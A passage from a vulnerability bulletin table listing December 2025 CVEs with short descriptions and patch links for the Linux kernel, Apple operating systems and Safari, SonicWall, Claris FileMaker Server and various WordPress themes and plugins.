__sys_sendmsg+0x8a/0xf0 do_syscall_64+0x81/0x970 ? __sys_bind+0xe3/0x110 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? sock_alloc_file+0x63/0xc0 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? alloc_fd+0x12e/0x190 ? put_unused_fd+0x2a/0x70 ? do_sys_openat2+0xa2/0xe0 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e [...] </TASK> Fix this by checking is_visible() before trying to touch the attribute. | 2025-12-16 | not yet calculated | CVE-2025-40355 | https://git.kernel.org/stable/c/ac2c526e103285d80a0330b91a318f6c9276d35a https://git.kernel.org/stable/c/c7fbb8218b4ad35fec0bd2256d2b9c8d60331f33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rockchip-sfc: Fix DMA-API usage Use DMA-API dma_map_single() call for getting the DMA address of the transfer buffer instead of hacking with virt_to_phys(). This fixes the following DMA-API debug warning: ------------[ cut here ]------------ DMA-API: rockchip-sfc fe300000.spi: device driver tries to sync DMA memory it has not allocated [device address=0x000000000cf70000] [size=288 bytes] WARNING: kernel/dma/debug.c:1106 at check_sync+0x1d8/0x690, CPU#2: systemd-udevd/151 Modules linked in: ... Hardware name: Hardkernel ODROID-M1 (DT) pstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : check_sync+0x1d8/0x690 lr : check_sync+0x1d8/0x690 .. Call trace: check_sync+0x1d8/0x690 (P) debug_dma_sync_single_for_cpu+0x84/0x8c __dma_sync_single_for_cpu+0x88/0x234 rockchip_sfc_exec_mem_op+0x4a0/0x798 [spi_rockchip_sfc] spi_mem_exec_op+0x408/0x498 spi_nor_read_data+0x170/0x184 spi_nor_read_sfdp+0x74/0xe4 spi_nor_parse_sfdp+0x120/0x11f0 spi_nor_sfdp_init_params_deprecated+0x3c/0x8c spi_nor_scan+0x690/0xf88 spi_nor_probe+0xe4/0x304 spi_mem_probe+0x6c/0xa8 spi_probe+0x94/0xd4 really_probe+0xbc/0x298 ... | 2025-12-16 | not yet calculated | CVE-2025-40356 | https://git.kernel.org/stable/c/22810d4cb0e8a7d51b24527e73beac60afc1c693 https://git.kernel.org/stable/c/ee795e82e10197c070efd380dc9615c73dffad6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: fix general protection fault in __smc_diag_dump The syzbot report a crash: Oops: general protection fault, probably for non-canonical address 0xfbd5a5d5a0000003: 0000 [#1] SMP KASAN NOPTI KASAN: maybe wild-memory-access in range [0xdead4ead00000018-0xdead4ead0000001f] CPU: 1 UID: 0 PID: 6949 Comm: syz.0.335 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 RIP: 0010:smc_diag_msg_common_fill net/smc/smc_diag.c:44 [inline] RIP: 0010:__smc_diag_dump.constprop.0+0x3ca/0x2550 net/smc/smc_diag.c:89 Call Trace: <TASK> smc_diag_dump_proto+0x26d/0x420 net/smc/smc_diag.c:217 smc_diag_dump+0x27/0x90 net/smc/smc_diag.c:234 netlink_dump+0x539/0xd30 net/netlink/af_netlink.c:2327 __netlink_dump_start+0x6d6/0x990 net/netlink/af_netlink.c:2442 netlink_dump_start include/linux/netlink.h:341 [inline] smc_diag_handler_dump+0x1f9/0x240 net/smc/smc_diag.c:251 __sock_diag_cmd net/core/sock_diag.c:249 [inline] sock_diag_rcv_msg+0x438/0x790 net/core/sock_diag.c:285 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x5a7/0x870 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x8d1/0xdd0 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg net/socket.c:729 [inline] ____sys_sendmsg+0xa95/0xc70 net/socket.c:2614 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2668 __sys_sendmsg+0x16d/0x220 net/socket.c:2700 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0x4e0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> The process like this: (CPU1) | (CPU2) ---------------------------------|------------------------------- inet_create() | // init clcsock to NULL | sk = sk_alloc() | | // unexpectedly change clcsock | inet_init_csk_locks() | | // add sk to hash table | smc_inet_init_sock() | smc_sk_init() | smc_hash_sk() | | // traverse the hash table | smc_diag_dump_proto | __smc_diag_dump() | // visit wrong clcsock | smc_diag_msg_common_fill() // alloc clcsock | smc_create_clcsk | sock_create_kern | With CONFIG_DEBUG_LOCK_ALLOC=y, the smc->clcsock is unexpectedly changed in inet_init_csk_locks(). The INET_PROTOSW_ICSK flag is no need by smc, just remove it. After removing the INET_PROTOSW_ICSK flag, this patch alse revert commit 6fd27ea183c2 ("net/smc: fix lacks of icsk_syn_mss with IPPROTO_SMC") to avoid casting smc_sock to inet_connection_sock. | 2025-12-16 | not yet calculated | CVE-2025-40357 | https://git.kernel.org/stable/c/5b6fc95c4a161326567bdf12a333768565b638f2 https://git.kernel.org/stable/c/99b5b3faf3220ba1cdab8e6e42be4f3f993937c3 https://git.kernel.org/stable/c/f584239a9ed25057496bf397c370cc5163dde419 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: stacktrace: Disable KASAN checks for non-current tasks Unwinding the stack of a task other than current, KASAN would report "BUG: KASAN: out-of-bounds in walk_stackframe+0x41c/0x460" There is a same issue on x86 and has been resolved by the commit 84936118bdf3 ("x86/unwind: Disable KASAN checks for non-current tasks") The solution could be applied to RISC-V too. This patch also can solve the issue: https://seclists.org/oss-sec/2025/q4/23 [pjw@kernel.org: clean up checkpatch issues] | 2025-12-16 | not yet calculated | CVE-2025-40358 | https://git.kernel.org/stable/c/f34ba22989da61186f30a40b6a82e0b3337b96fc https://git.kernel.org/stable/c/27379fcc15a10d3e3780fe79ba3fc7ed1ccd78e2 https://git.kernel.org/stable/c/2c8d2b53866fb229b438296526ef0fa5a990e5e5 https://git.kernel.org/stable/c/060ea84a484e852b52b938f234bf9b5503a6c910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel: Fix KASAN global-out-of-bounds warning When running "perf mem record" command on CWF, the below KASAN global-out-of-bounds warning is seen. ================================================================== BUG: KASAN: global-out-of-bounds in cmt_latency_data+0x176/0x1b0 Read of size 4 at addr ffffffffb721d000 by task dtlb/9850 Call Trace: kasan_report+0xb8/0xf0 cmt_latency_data+0x176/0x1b0 setup_arch_pebs_sample_data+0xf49/0x2560 intel_pmu_drain_arch_pebs+0x577/0xb00 handle_pmi_common+0x6c4/0xc80 The issue is caused by below code in __grt_latency_data(). The code tries to access x86_hybrid_pmu structure which doesn't exist on non-hybrid platform like CWF. WARN_ON_ONCE(hybrid_pmu(event->pmu)->pmu_type == hybrid_big) So add is_hybrid() check before calling this WARN_ON_ONCE to fix the global-out-of-bounds access issue. | 2025-12-16 | not yet calculated | CVE-2025-40359 | https://git.kernel.org/stable/c/1b61a1da3d8105ea1be548c94c2856697eb7ffd1 https://git.kernel.org/stable/c/710a72e81a7028e1ad1a10eb14f941f8dd45ffd3 https://git.kernel.org/stable/c/0ba6502ce167fc3d598c08c2cc3b4ed7ca5aa251 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/sysfb: Do not dereference NULL pointer in plane reset The plane state in __drm_gem_reset_shadow_plane() can be NULL. Do not deref that pointer, but forward NULL to the other plane-reset helpers. Clears plane->state to NULL. v2: - fix typo in commit description (Javier) | 2025-12-16 | not yet calculated | CVE-2025-40360 | https://git.kernel.org/stable/c/6abeff03cb79a2c7f4554a8e8738acd35bb37152 https://git.kernel.org/stable/c/c4faf7f417eea8b8d5cc570a1015736f307aa2d5 https://git.kernel.org/stable/c/b61ed8005bd3102510fab5015ac6a275c9c5ea16 https://git.kernel.org/stable/c/6bdef5648a60e49d4a3b02461ab7ae3776877e77 https://git.kernel.org/stable/c/c7d5e69866bbe95c1e4ab4c10a81e0a02d9ea232 https://git.kernel.org/stable/c/14e02ed3876f4ab0ed6d3f41972175f8b8df3d70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: ext4: change GFP_KERNEL to GFP_NOFS to avoid deadlock The parent function ext4_xattr_inode_lookup_create already uses GFP_NOFS for memory alloction, so the function ext4_xattr_inode_cache_find should use same gfp_flag. | 2025-12-16 | not yet calculated | CVE-2025-40361 | https://git.kernel.org/stable/c/5e6b27f4e68682aa3db9f83ca04adef89903159b https://git.kernel.org/stable/c/bb7d0d13c6e1f061464d1c425b08348a4e0c235d https://git.kernel.org/stable/c/add8458cac0b33a5e7a6b98457b38baea9600859 https://git.kernel.org/stable/c/199ab7b43c5ef7d384f6a08e786e107b3509acda https://git.kernel.org/stable/c/238f7a7356c33a9797a6297c6fdfd87f113b2325 https://git.kernel.org/stable/c/009127b0fc013aed193961686c28c2b541a5b2f3 https://git.kernel.org/stable/c/1534f72dc2a11ded38b0e0268fbcc0ca24e9fd4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix multifs mds auth caps issue The mds auth caps check should also validate the fsname along with the associated caps. Not doing so would result in applying the mds auth caps of one fs on to the other fs in a multifs ceph cluster. The bug causes multiple issues w.r.t user authentication, following is one such example. Steps to Reproduce (on vstart cluster): 1. Create two file systems in a cluster, say 'fsname1' and 'fsname2' 2. Authorize read only permission to the user 'client.usr' on fs 'fsname1' $ceph fs authorize fsname1 client.usr / r 3. Authorize read and write permission to the same user 'client.usr' on fs 'fsname2' $ceph fs authorize fsname2 client.usr / rw 4. Update the keyring $ceph auth get client.usr >> ./keyring With above permssions for the user 'client.usr', following is the expectation. a. The 'client.usr' should be able to only read the contents and not allowed to create or delete files on file system 'fsname1'. b. The 'client.usr' should be able to read/write on file system 'fsname2'. But, with this bug, the 'client.usr' is allowed to read/write on file system 'fsname1'. See below. 5. Mount the file system 'fsname1' with the user 'client.usr' $sudo bin/mount.ceph usr@.fsname1=/ /kmnt_fsname1_usr/ 6. Try creating a file on file system 'fsname1' with user 'client.usr'. This should fail but passes with this bug. $touch /kmnt_fsname1_usr/file1 7. Mount the file system 'fsname1' with the user 'client.admin' and create a file. $sudo bin/mount.ceph admin@.fsname1=/ /kmnt_fsname1_admin $echo "data" > /kmnt_fsname1_admin/admin_file1 8. Try removing an existing file on file system 'fsname1' with the user 'client.usr'. This shoudn't succeed but succeeds with the bug. $rm -f /kmnt_fsname1_usr/admin_file1 For more information, please take a look at the corresponding mds/fuse patch and tests added by looking into the tracker mentioned below. v2: Fix a possible null dereference in doutc v3: Don't store fsname from mdsmap, validate against ceph_mount_options's fsname and use it v4: Code refactor, better warning message and fix possible compiler warning [ Slava.Dubeyko: "fsname check failed" -> "fsname mismatch" ] | 2025-12-16 | not yet calculated | CVE-2025-40362 | https://git.kernel.org/stable/c/07640d34a781bb2e39020a39137073c03c4aa932 https://git.kernel.org/stable/c/ca3da8b27ab9a0923ad477447cfb8fc7f4b4c523 https://git.kernel.org/stable/c/22c73d52a6d05c5a2053385c0d6cd9984732799d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: fix field-spanning memcpy warning in AH output Fix field-spanning memcpy warnings in ah6_output() and ah6_output_done() where extension headers are copied to/from IPv6 address fields, triggering fortify-string warnings about writes beyond the 16-byte address fields. memcpy: detected field-spanning write (size 40) of single field "&top_iph->saddr" at net/ipv6/ah6.c:439 (size 16) WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439 The warnings are false positives as the extension headers are intentionally placed after the IPv6 header in memory. Fix by properly copying addresses and extension headers separately, and introduce helper functions to avoid code duplication. | 2025-12-16 | not yet calculated | CVE-2025-40363 | https://git.kernel.org/stable/c/2da805a61ef5272a2773775ce14c3650adb84248 https://git.kernel.org/stable/c/9bf27de51bd6db5ff827780ec0eba55de230ba45 https://git.kernel.org/stable/c/0bf756ae1e69fec5e6332c37830488315d6d771b https://git.kernel.org/stable/c/75b16b2755e12999ad850756ddfb88ad4bfc7186 https://git.kernel.org/stable/c/f28dde240160f3c48a50d641d210ed6a3b9596ed https://git.kernel.org/stable/c/c14cf41094136691c92ef756872570645d61f4a1 https://git.kernel.org/stable/c/b056f971bd72b373b7ae2025a8f3bd18f69653d3 https://git.kernel.org/stable/c/2327a3d6f65ce2fe2634546dde4a25ef52296fec |
| SonicWall--SMA1000 | A local privilege escalation vulnerability due to insufficient authorization in the SonicWall SMA1000 appliance management console (AMC). | 2025-12-18 | not yet calculated | CVE-2025-40602 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019 |
| Apple--iOS and iPadOS | A configuration issue was addressed with additional restrictions. This issue is fixed in visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Photos in the Hidden Photos Album may be viewed without authentication. | 2025-12-17 | not yet calculated | CVE-2025-43428 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A logging issue was addressed with improved data redaction. This issue is fixed in iOS 26.2 and iPadOS 26.2. An app may be able to access user-sensitive data. | 2025-12-17 | not yet calculated | CVE-2025-43475 | https://support.apple.com/en-us/125884 |
| Apple--iOS and iPadOS | A buffer overflow issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43501 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data. | 2025-12-17 | not yet calculated | CVE-2025-43514 | https://support.apple.com/en-us/125886 |
| Apple--Safari | This issue was addressed with improved URL validation. This issue is fixed in macOS Tahoe 26.2, Safari 26.2. On a Mac with Lockdown Mode enabled, web content opened via a file URL may be able to use Web APIs that should be restricted. | 2025-12-17 | not yet calculated | CVE-2025-43526 | https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in watchOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 was also issued in response to this report. | 2025-12-17 | not yet calculated | CVE-2025-43529 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--iOS and iPadOS | A race condition was addressed with improved state handling. This issue is fixed in watchOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43531 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--tvOS | Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in watchOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. A malicious HID device may cause an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43533 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--iOS and iPadOS | The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43535 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Tahoe 26.2, iOS 26.2 and iPadOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43536 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected Safari crash. | 2025-12-17 | not yet calculated | CVE-2025-43541 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Johnson Control--iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 | Successful exploitation of these vulnerabilities could allow an attacker to modify firmware and gain full access to the device. | 2025-12-17 | not yet calculated | CVE-2025-43873 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-02 |
| Apple--iOS and iPadOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.2, iOS 26.2 and iPadOS 26.2, watchOS 26.2. An app may be able to access a user's Safari history. | 2025-12-17 | not yet calculated | CVE-2025-46277 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data. | 2025-12-17 | not yet calculated | CVE-2025-46278 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in watchOS 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. An app may be able to identify what other apps a user has installed. | 2025-12-17 | not yet calculated | CVE-2025-46279 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.2. An app may be able to break out of its sandbox. | 2025-12-17 | not yet calculated | CVE-2025-46281 | https://support.apple.com/en-us/125886 |
| Apple--Safari | The issue was addressed with additional permissions checks. This issue is fixed in macOS Tahoe 26.2, Safari 26.2. An app may be able to access sensitive user data. | 2025-12-17 | not yet calculated | CVE-2025-46282 | https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125886 |
| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.2. An app may be able to access sensitive user data. | 2025-12-17 | not yet calculated | CVE-2025-46283 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in visionOS 26.2, iOS 26.2 and iPadOS 26.2, watchOS 26.2, macOS Tahoe 26.2. An app may be able to access sensitive payment tokens. | 2025-12-17 | not yet calculated | CVE-2025-46288 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.2. An app may bypass Gatekeeper checks. | 2025-12-17 | not yet calculated | CVE-2025-46291 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | This issue was addressed with additional entitlement checks. This issue is fixed in iOS 26.2 and iPadOS 26.2, iOS 18.7.3 and iPadOS 18.7.3. An app may be able to access user-sensitive data. | 2025-12-17 | not yet calculated | CVE-2025-46292 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125884 |
| Claris--FileMaker Server | To enhance security, the FileMaker Server 22.0.4 installer now includes an option to disable IIS short filename enumeration by setting NtfsDisable8dot3NameCreation in the Windows registry. This prevents attackers from using the tilde character to discover hidden files and directories. This vulnerability has been fully addressed in FileMaker Server 22.0.4. The IIS Shortname Vulnerability exploits how Microsoft IIS handles legacy 8.3 short filenames, allowing attackers to infer the existence of files or directories by crafting requests with the tilde (~) character. | 2025-12-16 | not yet calculated | CVE-2025-46294 | https://support.claris.com/s/answerview?anum=000048450&language=en_US |
| Claris--FileMaker Server | Apache Commons Text versions prior to 1.10.0 included interpolation features that could be abused when applications passed untrusted input into the text-substitution API. Because some interpolators could trigger actions like executing commands or accessing external resources, an attacker could potentially achieve remote code execution. This vulnerability has been fully addressed in FileMaker Server 22.0.4. | 2025-12-16 | not yet calculated | CVE-2025-46295 | https://support.claris.com/s/answerview?anum=000049059&language=en_US |
| Claris--FileMaker Server | An authorization bypass vulnerability in FileMaker Server Admin Console allowed administrator roles with minimal privileges to access administrative features such as viewing license details and downloading application logs. This vulnerability has been fully addressed in FileMaker Server 22.0.4. | 2025-12-16 | not yet calculated | CVE-2025-46296 | https://support.claris.com/s/answerview?anum=000049056&language=en_US |
| The African Boss--Get Cash | Missing Authorization vulnerability in The African Boss Get Cash get-cash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Get Cash: from n/a through <= 3.2.3. | 2025-12-18 | not yet calculated | CVE-2025-49041 | https://vdp.patchstack.com/database/Wordpress/Plugin/get-cash/vulnerability/wordpress-get-cash-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler Option Tree | Insertion of Sensitive Information Into Sent Data vulnerability in shinetheme Traveler Option Tree custom-option-tree allows Retrieve Embedded Sensitive Data.This issue affects Traveler Option Tree: from n/a through <= 2.8. | 2025-12-16 | not yet calculated | CVE-2025-49300 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-option-tree/vulnerability/wordpress-traveler-option-tree-plugin-2-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| AncoraThemes--ShieldGroup | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes ShieldGroup shieldgroup allows PHP Local File Inclusion.This issue affects ShieldGroup: from n/a through <= 2.13. | 2025-12-18 | not yet calculated | CVE-2025-49359 | https://vdp.patchstack.com/database/Wordpress/Theme/shieldgroup/vulnerability/wordpress-shieldgroup-theme-2-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Militarology | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Militarology militarology allows PHP Local File Inclusion.This issue affects Militarology: from n/a through <= 1.0.15. | 2025-12-18 | not yet calculated | CVE-2025-49360 | https://vdp.patchstack.com/database/Wordpress/Theme/militarology/vulnerability/wordpress-militarology-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Mamita | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Mamita mamita allows PHP Local File Inclusion.This issue affects Mamita: from n/a through <= 1.0.9. | 2025-12-18 | not yet calculated | CVE-2025-49361 | https://vdp.patchstack.com/database/Wordpress/Theme/mamita/vulnerability/wordpress-mamita-theme-1-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Gracioza | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gracioza gracioza allows PHP Local File Inclusion.This issue affects Gracioza: from n/a through <= 1.0.15. | 2025-12-18 | not yet calculated | CVE-2025-49362 | https://vdp.patchstack.com/database/Wordpress/Theme/gracioza/vulnerability/wordpress-gracioza-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Kings & Queens | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Kings & Queens kings-queens allows PHP Local File Inclusion.This issue affects Kings & Queens: from n/a through <= 1.1.16. | 2025-12-18 | not yet calculated | CVE-2025-49363 | https://vdp.patchstack.com/database/Wordpress/Theme/kings-queens/vulnerability/wordpress-kings-queens-theme-1-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Ludos Paradise | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Ludos Paradise ludos-paradise allows PHP Local File Inclusion.This issue affects Ludos Paradise: from n/a through <= 2.1.3. | 2025-12-18 | not yet calculated | CVE-2025-49364 | https://vdp.patchstack.com/database/Wordpress/Theme/ludos-paradise/vulnerability/wordpress-ludos-paradise-theme-2-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Jack Well | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Jack Well jack-well allows PHP Local File Inclusion.This issue affects Jack Well: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-49365 | https://vdp.patchstack.com/database/Wordpress/Theme/jack-well/vulnerability/wordpress-jack-well-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Hanani | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Hanani hanani allows PHP Local File Inclusion.This issue affects Hanani: from n/a through <= 1.2.11. | 2025-12-18 | not yet calculated | CVE-2025-49366 | https://vdp.patchstack.com/database/Wordpress/Theme/hanani/vulnerability/wordpress-hanani-theme-1-2-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Monyxi | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Monyxi monyxi allows PHP Local File Inclusion.This issue affects Monyxi: from n/a through <= 1.1.8. | 2025-12-18 | not yet calculated | CVE-2025-49367 | https://vdp.patchstack.com/database/Wordpress/Theme/monyxi/vulnerability/wordpress-monyxi-theme-1-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Palladio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Palladio palladio allows PHP Local File Inclusion.This issue affects Palladio: from n/a through <= 1.1.10. | 2025-12-18 | not yet calculated | CVE-2025-49368 | https://vdp.patchstack.com/database/Wordpress/Theme/palladio/vulnerability/wordpress-palladio-theme-1-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Lettuce | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Lettuce lettuce allows PHP Local File Inclusion.This issue affects Lettuce: from n/a through <= 1.1.7. | 2025-12-18 | not yet calculated | CVE-2025-49369 | https://vdp.patchstack.com/database/Wordpress/Theme/lettuce/vulnerability/wordpress-lettuce-theme-1-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Lymcoin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Lymcoin lymcoin allows PHP Local File Inclusion.This issue affects Lymcoin: from n/a through <= 1.3.12. | 2025-12-18 | not yet calculated | CVE-2025-49370 | https://vdp.patchstack.com/database/Wordpress/Theme/lymcoin/vulnerability/wordpress-lymcoin-theme-1-3-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Strux | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Strux strux allows PHP Local File Inclusion.This issue affects Strux: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-49371 | https://vdp.patchstack.com/database/Wordpress/Theme/strux/vulnerability/wordpress-strux-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| silverplugins217--Custom Fields Account Registration For Woocommerce | Incorrect Privilege Assignment vulnerability in silverplugins217 Custom Fields Account Registration For Woocommerce custom-fields-account-registration-for-woocommerce allows Privilege Escalation.This issue affects Custom Fields Account Registration For Woocommerce: from n/a through <= 1.2. | 2025-12-18 | not yet calculated | CVE-2025-49379 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-fields-account-registration-for-woocommerce/vulnerability/wordpress-custom-fields-account-registration-for-woocommerce-plugin-1-2-privilege-escalation-vulnerability?_s_id=cve |
